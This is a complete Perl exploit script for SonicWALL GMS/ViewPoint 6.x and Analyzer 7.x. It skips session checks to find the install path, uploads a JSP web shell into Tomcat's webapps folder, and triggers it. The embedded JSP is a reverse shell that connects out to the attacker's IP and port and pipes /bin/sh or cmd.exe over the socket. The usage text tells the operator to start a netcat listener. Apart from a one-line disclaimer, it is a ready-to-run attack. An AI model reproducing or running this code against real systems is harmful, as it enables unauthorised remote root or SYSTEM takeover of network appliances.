#!/usr/bin/perl
##
# Title: SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit
# Name: sgmsRCE.pl
# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#
# Use it only for education or ethical pentesting! The author accepts
# no liability for damage caused by this tool.
#
##
use strict;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use LWP::Protocol::https;
use Getopt::Std;
my %args;
getopt('hlp:', \%args);
my $victim = $args{h} || usage();
my $lip = $args{l};
my $lport = $args{p};
my $detect = $args{d};
my $shellname = "cbs.jsp";
banner();
my $gms_path;
my $target;
my $sysshell;
my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0,},);
$agent->agent("Mozilla/5.0 (X11; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0");
# Place your Proxy here if needed
#$agent->proxy(['http', 'https'], 'http://localhost:8080/');
print "[+] Checking host ...\n";
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'application/x-www-form-urlencoded; charset=UTF-8',
Content => [ num => "123456",
action => "show_diagnostics",
task => "search",
item => "application_log",
criteria => "*.*",
width => "500",
];
my $result = $agent->request($request);
if ($result->is_success) {
print "[+] Host looks vulnerable ...\n";
} else {
print "[-] Error while connecting ... $result->status_line\n";
exit(0);
}
my @lines=split("\n",$result->content);
foreach my $line (@lines) {
if ($line =~ /OPTION VALUE=/) {
my @a=split("\"", $line);
if ($a[1] =~ m/logs/i) {
my @b=split(/logs/i,$a[1]);
$gms_path=$b[0];
}
if ($gms_path ne "") {
print "[+] GMS Path: $gms_path\n";
last;
} else {
next;
}
}
}
if ($gms_path eq "") {
print "[-] Couldn't get the GMS path ... Maybe not vulnerable\n";
exit(0);
}
if ($gms_path =~ m/^\//) {
$target="UNX";
$gms_path=$gms_path."Tomcat/webapps/appliance/";
$sysshell="/bin/sh";
print "[+] Target ist Unix...\n";
} else {
$target="WIN";
$gms_path=$gms_path."Tomcat\\webapps\\appliance\\";
$sysshell="cmd.exe";
print "[+] Target ist Windows...\n";
}
&_writing_shell;
if (!$detect) {
print "[+] Uploading shell ...\n";
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'multipart/form-data',
Content => [ action => "file_system",
task => "uploadFile",
searchFolder => "$gms_path",
uploadFileName => ["$shellname"]
];
my $result = $agent->request($request);
if ($result->is_success) {
print "[+] Upload completed ...\n";
} else {
print "[-] Error while connecting ... $result->status_line\n";
exit(0);
}
unlink("$shellname");
print "[+] Spawning remote root/system shell ...\n";
my $result = $agent->get("$victim/appliance/$shellname");
if ($result->is_success) {
print "[+] Have fun ...\n";
} else {
print "[-] Error while connecting ... $result->status_line\n";
exit(0);
}
}
sub _writing_shell {
open FILE, ">", "$shellname" or die $!;
print FILE << "EOF";
<%\@page import="java.lang.*"%>
<%\@page import="java.util.*"%>
<%\@page import="java.io.*"%>
<%\@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader in = null;
BufferedWriter out = null;
try
{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
try
{
Socket socket = new Socket( "$lip", $lport );
Process process = Runtime.getRuntime().exec( "$sysshell" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
EOF
close(FILE);
}
sub usage {
print "\n";
print " $0 - SonicWALL GMS/VIEWPOINT/Analyzer Remote Root/SYSTEM exploit\n";
print "====================================================================\n\n";
print " Usage:\n";
print " $0 -h <http://victim> -l <yourip> -p <yourport>\n";
print " Notes:\n";
print " Start your netcat listener <nc -lp 4444>\n";
print " -d only checks if the Host is vulnerable\n";
print "\n";
print " Author:\n";
print " Nikolas Sotiriu (lofi)\n";
print " url: www.sotiriu.de\n";
print " mail: lofi[at]sotiriu.de\n";
print "\n";
exit(1);
}
sub banner {
print STDERR << "EOF";
--------------------------------------------------------------------------------
SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit
--------------------------------------------------------------------------------
EOF
}